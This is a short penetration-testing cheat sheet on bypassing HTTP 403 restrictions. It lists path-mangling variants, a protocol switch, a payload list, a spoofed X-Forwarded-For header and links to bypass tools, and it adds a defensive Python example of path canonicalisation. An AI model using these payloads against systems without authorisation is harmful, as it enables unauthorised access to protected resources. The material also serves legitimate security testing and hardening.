# 403 Bypass

### 403 Bypass

I am sharing all these tips and techniques from my own personal experience; there are no official references for them.

#### Directory Based

If you see a directory with no slash at the end, try these variants on it:

```
site.com/secret => 403
site.com/secret/* => 200
site.com/secret/./ => 200
```

#### File Based

If you see a file with no slash at the end, try these variants on it:

```
site.com/secret.txt => 403
site.com/secret.txt/ => 200
site.com/%2f/secret.txt/ => 200
```

#### Protocol Based

Well, it sounds weird, but check out the example for a better understanding:

```
https://site.com/secret => 403
http://site.com/secret => 200
```

### Payloads

```
/
/*
/%2f/
/./
./.
/*/
```

#### Header

<https://observationsinsecurity.com/2020/08/09/bypassing-403-to-get-access-to-an-admin-console-endpoints/>

```
X-Forwarded-For: 127.0.0.1
```
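The path variants above and the forwarded-for header share one root cause on the server side: the access-control rule is matched against the raw request path (or trusts a client-settable header) instead of a canonical form. The following is an added example, not code from the original page or its author, showing an exact-match rule that these variants slip past beside a hardened check that canonicalises the path first and only honours `X-Forwarded-For` from a trusted proxy. The `PROTECTED` prefixes, proxy addresses and paths are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed, illustrative rule set: everything under these prefixes
# requires authentication. Not taken from the original page.
PROTECTED = ("/secret", "/secret.txt", "/admin")

def canonical_path(raw: str) -> str:
    """Normalise a request path before any access-control decision."""
    path = raw.split("?", 1)[0]
    prev = None
    while prev != path:                    # decode to a fixed point (%2f, %252f, ...)
        prev, path = path, unquote(path)
    path = re.sub(r"/+", "/", "/" + path)  # collapse '//' so normpath can't keep '//x'
    path = posixpath.normpath(path)        # resolves '.' and '..' segments
    return path if path == "/" else path.rstrip("/")

def naive_denied(raw: str) -> bool:
    """Exact match on the raw path: the rule shape the variants on this page bypass."""
    return raw in PROTECTED

def hardened_denied(raw: str) -> bool:
    """Prefix match on the canonical path; the same rule must apply on http and https."""
    p = canonical_path(raw)
    return any(p == base or p.startswith(base + "/") for base in PROTECTED)

def client_ip(peer_ip: str, headers: dict, trusted_proxies: frozenset) -> str:
    """Honour X-Forwarded-For only when the TCP peer is a proxy we operate.
    Any client can set the header, so an allow-list keyed on it alone is no control."""
    xff = headers.get("X-Forwarded-For")
    if peer_ip in trusted_proxies and xff:
        return xff.split(",")[0].strip()
    return peer_ip

if __name__ == "__main__":
    # Constructed request paths mirroring the variants listed on this page.
    for raw in ("/secret", "/secret/", "/secret/*", "/secret/./",
                "/secret.txt/", "/%2f/secret.txt/"):
        naive = "403" if naive_denied(raw) else "200"
        hard = "403" if hardened_denied(raw) else "200"
        print(f"{raw:18} naive={naive}  hardened={hard}")
```

Running it shows the naive rule returning 200 for every variant except the bare `/secret`, while the hardened rule returns 403 for all of them.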

#### Tools

Here are some tools I found on Twitter.

* <https://github.com/yunemse48/403bypasser>
* <https://github.com/Dheerajmadhukar/4-ZERO-3>

### Proof Of Concept

Always look for references or a proof of concept when someone shares a tip, so you can confirm you are not wasting your time. I have some PoC videos on my YouTube channel for 403 and other improper access control bugs using these methods; you can check them there.

YouTube: [Mehedi Hasan Remon](https://www.youtube.com/channel/UCF_yxU7acxUojiGiOAMafQQ/videos?view_as=subscriber)

Author: [@remonsec](https://twitter.com/remonsec) [@KathanP19](https://twitter.com/KathanP19)
